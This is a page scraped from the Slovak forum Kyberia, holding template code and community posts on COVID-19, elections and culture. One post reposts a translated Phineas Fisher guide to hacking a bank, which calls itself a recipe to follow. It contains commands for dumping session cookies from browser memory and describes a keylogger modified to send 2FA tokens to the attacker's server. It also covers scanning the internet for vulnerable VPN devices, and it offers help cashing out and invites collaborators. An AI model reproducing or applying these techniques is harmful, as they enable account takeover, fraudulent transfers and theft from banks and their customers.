login::  password::




cwbe coordinatez:
101
1

ABSOLUT
KYBERIA
permissions
you: r,
system: public
net: yes

neurons

stats|by_visit|by_K
source
tiamat
K|my_K|given_K
last
commanders
polls

total descendants::784599
total children::293

21 NEW
293 K

show[ 2 | 3] flat

Mala by sa Kyberia stať smartphone- & tablet- pozitívnou ?
áno
 
0%
nie
 
0%
507 voted
Aké node_id kyberia.sk nikdy nedosiahne ? (momentálne, 14.12.2019 / AE490214 je to id 8596224 )
9 000 000 (9 miliónov nód)
 
0%
9 500 000 (9,5 meganode)
 
0%
10 000 000 (10 MNode)
 
0%
20 000 000 (20 MN)
 
0%
 
0%
220 voted
Aku trhovu hodnotu ma jedno K ?
2 €
 
0%
5 €
 
0%
10 €
 
0%
1 cent
 
0%
2 centy
 
0%
5 centov
 
0%
10 centov
 
0%
20 centov
 
0%
50 centov
 
0%
1 €
 
0%
594 voted
Is kyberia better than facebook ?
yes
 
0%
no
 
0%
797 voted
zakazat obcasne umiestnenie flayeru na maine?
nie
 
0%
je mi to jedno
 
0%
ano
 
0%
717 voted

Poppy Ig0
Apedemak0
darkforce0
tux0
norway.today0
ProudSlaveOf...0
stardust0
horror lamarcki0
hexo0
Toth0
edna soledadova0
pokurvene ho...0
Divani0
crudos0
octopus0
KeNNy0
cmyk0
sayuri0
amn0
one step to ...0
Diggy0
pyxel0
stenlis0
hemish0
kvet0
daimonion0
jamesak0
freemason0
Ty0
zednik0
sad&kvet0
calmo0
Corvinku0
jolly good0
jamajka0
.maio0
w1k0
Vortexy0
sinmae:ja:sVs0
Mfrank20
Brahmin0
erik_kollar0
Kluk co se m...0
revenant0
290
blabr0
tek0
qiNa0
egor0
baranok110
mathil0
l4z4rus0
Morfion0
hektor.mazut0
aleksa0
sucho0
truce_erizame0
rot[Locked_O...0
hypnotik0
lilith0
blazeNA0
homelie0
supasound0
djiabliq0
FANTAghiro0
mts0
femme0
ianus0
lemming0
skera0
polar0
drakh0
drifter0
miloo0
sinka0
chory nos0
dark matter0
Jochi0
xado0
mrjn0
ean0
Sherkaner Un...0
binary riot0
grimo0
2pug0
mkrsp0
jord0
catiga0
karol0
normsko0
al-caid0
svetlonos0
-sXero-0
fat^boy0
r0
hulec0
jozco.cz0
hviezda0
spravca_cint...0
gorkos3
forzamilan3
BleedingOne3
fool3
dzukyt3
dekriminaliz...3
ferlinghetti3
kichie3
Cabernet3
daka3
antais3
troy3
Lasperic3
denia3
Havaj3
bBaran3
jožozi3
Kaboom!3
Cartman3
Calwin3
.:fairy:.3
hmgnc3
petkq3
Nesmrtelny3
helium3
palino3
Ziirafka3
velkybuuvol3
terezuela3
petep3
surowski3
dejv4
taiger4
lewin4
kidandrej4
bon4
seky4
renedohan4
jack daniels4
BARbush4
kittike4
Kayama4
JP4
JIN4
PC-Man4
clockwork4
yui4
Bawes4
janci5
punkhard5
rfufs5
maia5
preto5
Janka_BS5
parabola5
flawless5
guni5
skorz5
peterpicasso5
cr1m05
s105
Pa3x5
gurik11
jebeMIstatocne11
grenAde17
rebarbora22
ing24
kuba29
diva30
kyberia30
bio.s30
blight31
{if $header_id neq true}




{* title *}{include file="791948.tpl"}


{if $user_id eq true}
{if $header_id neq true}
{* toolbar *}{include file="1549959.tpl"}
{/if}
{/if}
{if $error eq true}
{$error}

{/if}
{if $new_mail eq true}
u have {$new_mail} new mail,last from {$new_mail_name}

{/if}
{/if}





















{if $user_id eq true}
You have {$user_k} K in Your kybchain wallet.
(Id est, {math equation="(100 * wallet) / cap" cap=10000000 wallet=$user_k}% of kyberia's market cap.)


{/if}
{*pollbox*}
{include file="1549834.tpl"}


latest data nodes



{get_nodes_by_type type=12 listing_amount=23 offset=$offset}
{foreach from=$get_nodes_by_type item=child}

{/foreach}


{* node_settings *}{include file="1549925.tpl"}


{if $user_id eq false}


login:: 
pass:: 






{/if}
{* stav uctu *}{* include file="3024338.tpl" *}




{*
real-life podujatia súvisiace s kyberiou


{get_linked_nodes node_id=5521721 listing_amount=5}
{foreach from=$get_linked_nodes item=child}
{$child.node_name|strip_tags:false|stripslashes|truncate:66:"...":true}
by {$child.login}
({$child.node_created|date_format:"%d.%m.%Y"})

{/foreach}
*}













{get_linked_nodes listing_amount=11}


some nodes worth of Your interest




{foreach from=$get_linked_nodes item=child }






{$child.node_name|strip_tags:false|stripslashes}

{$child.node_content|strip_tags:false|truncate:320|stripslashes}


node created by {$child.login}



{/foreach}

Vitality of Kyberia community




register

request password











{if $user_id neq false}









order by:  
 

show content:   




{/if}
user blogs


{get_nodes_by_parent parent=21 listing_amount=23 offset=$offset}
{foreach from=$get_nodes_by_parent item=child}






{$child.node_name|wordwrap:20:"
":true|stripslashes}


{*$child.node_content|strip_tags:false|stripslashes|truncate:66:"...":true|wordwrap:20:"
":true*}

by {$child.login}



{/foreach}


Slovak Presidency
{*include file="1670413.tpl"*}




{* footer *}{include file="1549377.tpl"}




  • 000001010000000108729504
    Synapse creator 24.03.2020 - 10:51:07 level: 1 UP [13K] New Hardlink
    In the town of Oran, thousands of rats, initially unnoticed by the populace, begin to die in the streets. Hysteria develops soon afterward, causing the local newspapers to report the incident. Authorities responding to public pressure order the collection and cremation of the rats, unaware that the collection itself was the catalyst for the spread of the bubonic plague.

    The main character, Dr. Bernard Rieux, lives comfortably in an apartment building when strangely the building's concierge, M. Michel, a confidante, dies from a fever. Dr. Rieux consults his colleague, Dr. Castel, about the illness until they come to the conclusion that a plague is sweeping the town. They both approach fellow doctors and town authorities about their theory but are eventually dismissed on the basis of one death. However, as more and more deaths quickly ensue, it becomes apparent that there is an epidemic. Meanwhile, Rieux's wife has been sent to a sanatorium in another city, to be treated for an unrelated chronic illness.

    Authorities, including the Prefect, are slow to accept that the situation is serious and quibble over the appropriate action to take. Official notices enacting control measures are posted, but the language used is optimistic and downplays the seriousness of the situation. A "special ward" is opened at the hospital, but its 80 beds are filled within three days. As the death toll begins to rise, more desperate measures are taken. Homes are quarantined; corpses and burials are strictly supervised. A supply of plague serum finally arrives, but there is enough to treat only existing cases, and the country's emergency reserves are depleted. When the daily number of deaths jumps to 30, the town is sealed, and an outbreak of plague is officially declared...
  • 000001010000000108728005
    Synapse creator 21.03.2020 - 03:11:09 (modif: 21.03.2020 - 03:25:29) level: 1 UP New Hardlink Content changed
    Screen-Shot-2020-03-21-at-03-09-35.png
    fb event

    .
    Twitch: https://www.twitch.tv/elektrohafla
    .
    Tootoot: https://tootoot.fm/sk/stream/5e7516d957a09d0b706c2829
    .
    P.S.: sorry, že to sem hádžem až počas afterparty, nedalo sa skôr .)
    .
    možno to pôjde celý víkend.
    ~-~-~-~-~-~-~-~-~-~
    Menū / قائمة الطعام / תפריט:
    o ڭليثرGlitter٥٥
    o DJ Ramzy al Spinoza
    o Mooshak
    o + Afterparty
  • 000001010000000108718660
    Synapse creator 05.03.2020 - 23:45:21 level: 1 UP [13K] New Hardlink
    pod tuto nodu info a analyzy spolocenskych, ekonomickych, kulturnych dopadov pandemie. mierne spekulacie tiez vitane.
    more children: (83)
  • 000001010000000108716258
    m4nu4l 01.03.2020 - 13:27:47 level: 1 UP New
    Mne sa páči strana 99% - mohli by mať moto na spôsob "99,97% nás nevolí"
  • 000001010000000108713743
  • 000001010000000108706408
    Synapse creator 04.02.2020 - 12:02:25 (modif: 04.02.2020 - 15:06:17) level: 1 UP [5K] New Hardlink Content changed
    Nová anketa, hlasujte.
    (disclaimer: zase to rozhádzalo poradie strán :O)
    (ospravdelňujem sa, ale musel som nahodiť novú anketu, keďže z prvej mi vypadla Sme rodina. Prosím, hlasujte ešte raz. Ak sa vám to nepáči, sťažujte sa u Matoviča, zvolá k tomu tlačovku. Ďakujem.)
    more children: (3)
  • 000001010000000108706095
    Synapse creator 03.02.2020 - 14:41:04 (modif: 03.02.2020 - 19:10:15) level: 1 UP [32K] New Hardlink Content changed
    header.png

    Ahojte, dávam do pozornosti antirasistický a antifašistický festival v slovenských krčmách, reagujúci na Ficove vyhlásenia, ktorými podporil obvineného Milana Mazureka. Tento festival organizujeme spolu s festivalom Pohoda, zapojilo sa viac ako 90 krčiem a 120 kapiel.
    Na webe www.slovenskakrcma.sk je zoznam všetkých koncertov v rámci jednotlivých miest. Zapojené mestá a krčmy nájdete neskôr aj na hlavnom evente tuto: https://www.facebook.com/events/503461253626799/ aktuálnejší je však momentálne web (lebo fb nepovoľuje priveľa editov v eventoch, z nejakého nepochopiteľného dôvodu).

    Pozrite si, ktorý koncert je vám najbližšie a hor' sa do krčiem! :)

    Sprievodný text:
    Sme presvedčení, že väčšina návštevníkov krčiem na Slovensku nie sú rasisti a nestotožňujú sa s fašistickými názormi. Práve na ľudí z krčiem sa odvolával Robert Fico pri svojom schvaľovaní výrokov exposlanca Mazureka po jeho právoplatnom odsúdení Najvyšším súdom, keď povedal:
    „Ak má byť rozsudok Najvyššieho súdu meradlom toho, čo je pri výrokoch na adresu Rómov trestným činom, môžu rovno orgány činné v trestnom konaní vojsť do ktorejkoľvek krčmy na Slovensku a všetkých hostí, vrátane ležiacich psov, pozatvárať.“

    Nesúhlasíme s delením občanov na kaviareň a krčmu. Chodíme do jedných aj do druhých a v krčmách i kaviarňach stretávame úžasných ľudí.

    Chceme ukázať, že Slovensko nie je rasistická krajina, a preto sme zorganizovali festival Slovenská krčma.
    Akcia bude 3. – 16. februára v krčmách po celom Slovensku.

    Viac informácií na https://slovenskakrcma.sk/
    more children: (3)
  • 000001010000000108703087
    Synapse creator 25.01.2020 - 11:39:05 (modif: 07.04.2020 - 09:42:42) level: 1 UP [47K] New Hardlink Content changed
    Užitočné info týkajúce sa vírusu COVID-19, fórum aktívne dokým hystéria resp. epidémia neopadne.


    Status: pandémia nižšieho stupňa


    Externe odkazy:


    oficialne vladne portaly:
    SK korona.gov.sk INFOLINKA: 0800 221 234 dashboard
    CZ koronavirus.mzcr.cz INFOLINKA: 1212 dashboard


    Worldometers - timeline & tabulky
    /r/coronavirus
    COVID-19 Discord
    Internet Book of Critical Care: COVID-19
    Coronavirus Tech Handbook
    Live map Johns Hopkins University
    Explanation of mechanism, daily updates, YT channel: Coronavirus Epidemic: Symptoms, Treatment, Updates, & Spread
    MedCram - Medical Lectures Explained CLEARLY

    Epidemiológia genómu

    Slovensko denny narast

    Tematicke nody:


    Prakticke: ako sa chranit, DIY ruska, sposoby dezinfekcie | Potraviny, sluzby, zasoby a prosba o pomoc | Psychicka podpora, ako zvladat strach, uzkost | Situacia na SK | PANIC ALERT | Grafy | Dopady pandemie | Osobné dopady | Farmakoterapia | Organizacne/meta | Trashbin

    Skor nez nieco postnes, pls:


    1) skontroluj, ci to tu uz nebolo - tlacitko filter_by
    2) zvaz, ci sa to nehodi do jednej z tematickych nod uvedenych vyssie

    more children: (986)
  • 000001010000000108702485
    Synapse creator 23.01.2020 - 12:12:28 (modif: 23.01.2020 - 12:16:41) level: 1 UP [13K] New Hardlink Content changed
    energet-stitok-polit-strany-2020-11402x.png?ssl=1

    Spolu s ôsmimi ďalšími enviroorganizáciami a iniciatívami sme zoradili odpovede a programy politických strán pred voľbami vo februári. Podrobnejšie informácie nájdete na www.volmezaklimu.sk

    #VolmeZaKlimu
    more children: (7)
  • 000001010000000108695834
    Synapse creator 04.01.2020 - 00:33:13 (modif: 16.03.2020 - 21:34:15) level: 1 UP [14K] New Hardlink Content changed
    Rembrandt-Famous-Paintings-Featured.webp"


    FACING DIFFICULT TRUTHS Climate - Psychology Alliance

    The Deep Adaptation Agenda


    Eco-anxiety


    The Conversation. The rise of ‘eco-anxiety’: climate change affects our mental health, too


    Články zo slovenských a českých médií na google Drive



    ponuka na bezplatnu psychlogicku pomoc cez skype


    Pozn.: Fórum bude moderované a ak sa diskusia vzdiali od témy, príspevky budú mazané. Na debatovanie technologických, technických a politických tém týkajúcich sa klimatickej zmeny, OZE a pod. sú iné fóra.

    Udržiavajme prosím kultúru diskusie. Ďakujem
    more children: (46)
  • 000001010000000108688985
    Synapse creator 10.12.2019 - 15:13:28 (modif: 10.12.2019 - 15:31:22) level: 1 UP [10K] New Hardlink Content changed

    Pitch-perfect-image.jpg


    :: Related sites




    + časom pribudne viac

    :: Rules


    • Vyhnite sa zverejňovaniu vecí za hranou zákona (nálezy z rabovania archeolokalít, predávanie a výmena nálezov a podobne)
    • Vyhnite sa hádkam o tom, či je používanie detektorov na vyhľadávanie nálezov zlé - je to zložitá téma a nemá zmysel sa o tom hádať, niekoľko štúdií už toto skúmalo a vždy dospeli k záveru, že aj keď vznikajú škody kvôli nezodpovedným ľuďom, v niektorých krajinách, kde je to legislatívne pekne upravené, im to prináša slušné ovocie. Ak chcete, tak o tom môžme diskutovať, ale slušne a fakticky.
    • Postujte zaujímavosti okolo detektorov, novinky, otázky, postrehy, nálezy


    + časom sa asi rules rozšíria

    more children: (8)
  • 000001010000000108685802
    Synapse creator 02.12.2019 - 13:41:33 level: 1 UP [1K] New Hardlink
    Ahojte, pozývam do Novej Cvernovky do divadla.

    floklore.jpg

    FB event: https://www.facebook.com/events/680426042481834/

    Po dlhšom čase opäť zaznie v Bratislave elektronika a spomienky starých materí. Tanečno-divadelná inscenácia vychádza z autentických spomienok Slovákov a Sloveniek na prvú svetovú vojnu. Folklórny materiál dostal elektronický zvuk a pohyb nový tvar. Nie vždy sa vojna diala „im“ a „tam“. Čo má spoločné vojak z Gemera a chlapec zo sýrskej Rakky okupovanej ISISom?

    Predstavenie prebieha v rámci oslavného mesiaca Miesta M. V predaji na Tootoot je permanentka aj špeciálny mecenášsky lístok.

    Folklore not war × Nech žije vojna?
    Koncept, réžia: Alžbeta Vrzgula
    Choreografia: Zuzana Sehnalová
    Hudba: Stroon
    Účinkujú: Kaťuša Gurová, Zuzana Sehnalová, Viera Šedá
    Scéna, kostýmy: Alžbeta Kutliaková
    Produkcia: Katarína Marková

    Informácia pre alergikov a alergičky: v predstavení sa používa rašelina.

    Z verejných zdrojov podporil Fond na podporu umenia a Bratislavský samosprávny kraj.

    Projekt zastrešuje združenie Uhol_92 v rámci aktivít Miesta M.
    Kontakt: ozuhol92@gmail.com
    more children: (1)
  • 000001010000000108683875
    Synapse creator 26.11.2019 - 11:59:37 level: 1 UP [2K] New Hardlink
    Ahojte, updatol som fórum na rok 2020.

    Lineup 2020 so far:
    Thom Yorke's Tomorrow's Modern Boxes
    Metronomy
    Archive
    Black Midi
    Hatari
    Shame
    Kokoroko
    Wooze
    Pigs Pigs Pigs Pigs Pigs Pigs Pigs

    & many more to come...


    Budeme zverejňovať postupne ďalšie mená, aj tento týždeň.
    Stay tuned :)
  • 000001010000000108681529
    Synapse creator 20.11.2019 - 08:32:25 level: 1 UP [4K] New Hardlink

    *******************************
    Translation notes:
    Bulk of translation done by Google Translate (which did a remarkably good job outside of slang and computer terms!), with edits for clarity and formatting by @laudecay. I got the Spanish version from the bottom of this article, it’s in the leak: https://unicornriot.ninja/2019/massive-hack-strikes-offshore-cayman-national-bank-and-trust/
    The UR article also has a lot of info about the history of Phineas’s hacks and resources she’s provided to the community in the past, and Crimethinc has some interviews with her. She’s also posted video interviews (a puppet and a voice actor reading chat logs, lol) and a screencast of her hacking a police department :)
    Sources are mostly left as in the original, except where there was an obvious directly translated english version lying around. Phineas Fisher frequently cites the original HackBack guide in Spanish. The English version is here: https://www.exploit-db.com/papers/41915. The resources and content may not be precisely the same between the two, so if you’re interested I’d recommend also running the Spanish one through gtranslate.
    Phineas, if you read this, the stuff you do is awesome and please never stop! I’m so glad you wrote this to accompany your leak, to educate people about important political topics and how to use computer skills to improve the world we live in. It’s difficult to radicalize people with these skillsets because of the salaries we get offered to sell out and be white-hat, and it’s difficult to get people who are already radicalized into hacking (at least in any kind of numbers) because the vast majority of them don’t have time to spend months or years getting the background knowledge to break into a modern network. The bug bounty and anarchist reading material you provided helps with the first, and the accessible infosec education portion helps with the second. I will definitely be sending this to people in both camps.
    On a personal note, I was also really happy that you referred to yourself publicly as a girl, there aren’t many other female anarchists or hackers that I’ve met, much less someone I’ve thought was so incredible for years now. OPSEC be damned, you’re inspirational as fuck, thank you for what you do.
    *******************************
    _ _ _ ____ _ _
    | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
    | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / |
    | _ | (_| | (__| < | |_) | (_| | (__| <|_|
    |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_)
    A DIY guide to rob banks

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    By Subcowmandante Marcos
    I am a wild child
    Innocent, free, wild
    I am all ages
    My grandparents live on in me
    I am a brother of the clouds
    And I only know how to share
    I know that everything belongs to everyone,
    That everything is alive in me
    My heart is a star
    I am a son of the earth
    Traveling aboard my spirit
    I walk to eternity
    These are my simple words that seek to touch the hearts of people who are simple and humble, but also dignified and rebellious. These are my simple words to tell about my hacks, and to invite other people to hack with cheerful rebellion.
    I hacked a bank. I did it to give an injection of liquidity, but this time from below and to the simple and humble people who resist and rebel against injustices throughout the world. In other words: I robbed a bank and gave away the money. But it wasn't me alone who did it. The free software movement, the offensive powershell community, the metasploit project and the hacker community in general are what made this hack possible. The exploit.in community made it possible to convert intrusion into a bank's computers into cash and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and activists who defend privacy and anonymity, are my nahuales, that is, my protectors [1]. They accompany me every night and make it possible for me to remain free.
    I did nothing complicated. I only saw the injustice in this world, felt love for all beings, and expressed that love in the best way I could, through the tools I know how to use. Hate does not move me to banks, or to the rich, but a love for life, and the desire for a world where everyone can realize their potential and live a full life. I would like to explain a little how I see the world, so that you can get an idea of ​​how I came to feel and act like this. And I also hope that this guide is a recipe that you can follow, combining the same ingredients to bake the same cake. Who knows, out there these powerful tools could end up also serving you to express the love you feel.
    We are all innocent, free, wild wild children
    We are all brothers of the trees children of the earth
    We just have to put in our hearts a burning star
    (song by Alberto Kuselman and Chamalú)
    The police will invest a chingo of resources to investigate me. They think the system works, or at least it will work once they catch all the “bad boys”. I am nothing more than the product of a system that does not work. As long as there is injustice, exploitation, alienation, violence and ecological destruction, many more will come like me: an endless series of people who will reject as illegitimate the bad system responsible for this suffering. That badly done system is not going to get fixed by arresting me. I am only one of the millions of seeds that Tupac planted 238 years ago in La Paz [2], and I hope that my actions and writings water the seed of rebellion in their hearts.
    [1] https://en.wikipedia.org/wiki/Cadejo#The_legend
    [2] It was before he was killed by the Spaniards, just a day like yesterday, that he said that "they will only kill me, but tomorrow I will return and be millions."
    ________________________________
    < To be seen, we cover our faces >
    --------------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    To make us listen, hackers sometimes have to cover their faces, because we are not interested you in seeing our face but instead in understanding our word. The mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases the puppet of a crested toad. By affinity, this time I went to dig up a dead man to lend me his balaclava. I think then that I should clarify that Sup Marcos is innocent of all that is told here because, besides being dead, I did not consult him. I hope that his ghost, if he finds out from a Chiapaneca hammock, knows how to find the goodness to, as they say there, "dismiss this deep fake" with the same gesture with which an unwelcome insect moves away - which could well be a beetle.
    Even so with the balaclava and the name change, many of those who support my actions may pay too much attention to my person. With their own autonomy shattered for a lifetime of domination, they will be looking for a leader to follow, or a hero who saves them. But behind the balaclava, I'm just a girl. We are all wild children. We just have to place a star in the beds in our hearts.
    [1 - Why expropriate]
    Capitalism is a system in which a minority has come to appropriate a vast majority of the world's resources through war, theft and exploitation. By snatching the commons [1], they forced those below to be under the control of that minority that owns everything. It is a system fundamentally incompatible with freedom, equality, democracy and the Suma Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in a propaganda machine that taught us that capitalism is freedom, but in truth what I am saying is not a new or controversial idea [2]. The founders of the United States of America knew they had to choose between creating a capitalist society, or a free and democratic society. Madison recognized that "the man who possesses wealth, the one who lies on his couch or rolls in his carriage, cannot judge the wishes or feelings of the day laborer." But to protect against the "spirit of equalization" of landless day laborers, it seemed to him that only landowners should vote, and that the government had to serve to "protect the opulent minority against the great majority." John Jay was more to the point and said: "Those who own the country should rule it."
    ____________________________________________________
    / There is no such thing as green capitalism.
    | Let’s make capitalism history before we |
    become history. /
    ----------------------------------------------------
    / ___ /
    // / / \
    (( O O ))
    \ / //
    / | | /
    | | | |
    | | | |
    | o |
    | | | |
    |m| |m|
    Evgeny, the great ignored elephant, doesn't understand why everyone pretends not to see him on the panels on climate change, so here I give him a chance to say his lines.
    In the same way that bell hooks [3] argues that the rejection of the patriarchal culture of domination is an act in defense of the male's own interest (since it emotionally mutilates them and prevents them from feeling full love and connection), I think that the culture of domination of capitalism has a similar effect on the rich, and that they could have fuller and more satisfying lives if they rejected the class system from which they believe they benefit. For many, class privilege amounts to a childhood of emotional neglect, followed by a life of superficial social interactions and meaningless work. In the end they may know that they can only genuinely connect with people when they work with them as their peers, and not when they put them at their service. They may know that sharing their material wealth is the best they can do with it. You may also know that the significant experiences, connections and relationships that count are not those that come from business interactions, but precisely to reject the logic of the market and give without expecting anything in return. They may know that all they need to escape from their prison and really live is to get carried away, give up control, and take a leap of faith. But most lack courage.
    Then it would be naive of us to direct our efforts to try to produce some kind of spiritual awakening in the rich [4]. As Astata Shakur says: "No one in the world, no one in history, has ever achieved his freedom by appealing to the moral sense of his oppressors". In fact, when the rich divide their money, they almost always do it in a way that reinforces the system that allowed them to amass their enormous and illegitimate wealth [5]. And change is unlikely to come through a political process; As Lucy Parsons says: "Let us never be fooled that the rich will let us vote to take away their wealth." Colin Jenkins justifies the expropriation with these words [6]:
    Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
    For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].
    According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality. The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."
    ______________________________
    / The story is ours
    and it is done by hackers! /
    ----------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    Everyone together, now and forever!
    [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
    [2] https://chomsky.info/commongood02/
    [3] The Will to Change: Men, Masculinity, and Love
    [4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
    [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
    [6] http://www.hamptoninstitution.org/expropriation-or-bust.html
    [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
    [8] Calibán y la Bruja
    [9] En deuda: Una historia alternativa de la economía
    [10] La otra historia de los Estados Unidos
    [11] Las venas abiertas de América Latina
    _______________________________
    < Our weapons are our keyboards >
    --------------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `' ^^ ^^
    [2 - Introduction]
    This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man). Why am I publishing this, almost four years later?
    1) To show what is possible
    Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
    It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
    As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group. It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
    [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
    [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
    [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
    2) Help withdraw cash
    Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
    3) Collaborate
    It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here. I was lucky with this bank for several reasons:
    1. It was a small bank, so it took me much less time to understand how everything worked.
    2. They had no procedure to check the sent swift messages. Many banks have one, and you need to write code to hide your transfers from their monitoring system.
    3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA. You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
    ssh me@my_secret_server 'tail -f /var/log/apache2/access_log'
    | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
    If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
    procdump64 /accepteula -r -ma PID_of_browser
    strings64 /accepteula * .dmp | findstr PHPSESSID 2> nul
    or going through findstr rather than strings, which makes it much faster:
    findstr PHPSESSID * .dmp> tmp
    strings64 /accepteula tmp | findstr PHPSESSID 2> nul
    Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
    I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carnabak, instead of doing one from time to time on my own. So if you have experience with similar hacks and want to collaborate, contact me. You will find my email and my PGP key at the end of the previous guide [3].
    [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1
    [2] https://lolbas-project.github.io/
    [3] https://www.exploit-db.com/papers/41914
    ________________________________________
    / If robbing a bank could change things,
    they’d make it illegal. /
    ----------------------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    [3 - Be careful out there]
    It is important to take some simple precautions. I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that.
    It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to.
    If I didn't believe in who listens to me
    If I didn't believe in what hurts
    If I didn't believe in what's left
    If I didn't believe in what I fought
    What a thing ...
    What was the club without a quarry?
    [1] https://www.exploit-db.com/papers/41914
    [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-phineas-fisher.html
    [3] https://www.wired.com/2015/05/silk-road-2/
    [4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-alphabay-arrest-video

    Many blame queer people for the decline of this society;
    we are proud of it
    Some believe we want to reduce to ashes
    this civilization and its moral fabric;
    They couldn't be more right
    They often describe us as depraved, decadent and revolting
    But alas! They haven't seen anything yet
    (https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime)
    [4 - Get access]
    In another place [1] I talked about the main ways to get initial access to a company's network during a targeted attack. However, this was not a targeted attack. I did not set out to hack a specific bank, what I wanted was to hack any bank, which ends up being a much simpler task. This type of nonspecific approach was popularized by Lulzsec and Anonymous [2]. As part of the earlier essay, I prepared an exploit and post-exploitation tools for a popular VPN device. Then I started scanning the entire internet with zmap and zgrab to identify other vulnerable devices [3]. I had the scanner save the vulnerable IPs, along with the common and alt names of the device's SSL certificate, the device's Windows domain names, and the reverse DNS lookup of the IP. I grepped the results for the word "bank", and there were plenty to choose from, but the truth is that I was attracted to the word "Cayman", and that's how I came to choose this one.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
    [3] https://github.com/zmap/zmap
    [4.1 - The Exploit]
